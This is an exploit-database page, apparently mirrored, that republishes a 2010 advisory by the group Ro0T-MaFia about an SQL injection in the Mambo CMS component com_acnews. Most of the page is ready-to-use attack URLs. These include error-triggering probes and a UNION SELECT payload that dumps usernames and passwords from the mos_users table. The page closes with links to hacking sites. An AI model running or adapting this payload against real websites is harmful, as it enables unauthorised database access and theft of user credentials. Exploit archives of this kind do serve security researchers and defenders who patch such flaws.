[] NeoSense
E X P L O I T S
title author type platform port cve id

Mambo Component 'com_acnews' - 'id' SQL Injection

Author: Zero Bits & Xzit3
type: webapps
platform: php
port: 
date_added: 2010-02-15 
date_updated: 2016-10-31 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
Mambo Component com_acnews [id] | SQL Injection

Author: Zero Bits & Xzit3
Team: Ro0T-MaFia
Member's: Zero Bits, CMD, Jeferx, Xzit3, XP3RM4 & Jeferx
Date: 15/02/2010
Contact: Zer_Bits@GobiernoFederal.com - wscalle1@e-r00t.org
Country: Venezuela - Mexico
############################

Vulnerability's:

[+] SQL Injection:
Error: You have an error in your SQL syntax.


BUG: index.php?lang=en&option=com_acnews&task=view&id=188(SQLi)

Real example:

http://server/index.php?lang=en&option=com_acnews&task=view&id=-188'&Itemid=136&page=0 (Web Vuln.)
http://server/index.php?lang=en&option=com_acnews&task=view&id=331%27&page=0

http://server/index.php?option=com_acnews&page=1&Itemid=-1+UNION+SELECT+1,2,concat%28username,0x20,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20mos_users--

###########################

Visit:

Ilegalintrusion.NET | Seguridadblanca.ORG | Diosdelared.COM | Remoteexecution.ORG
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.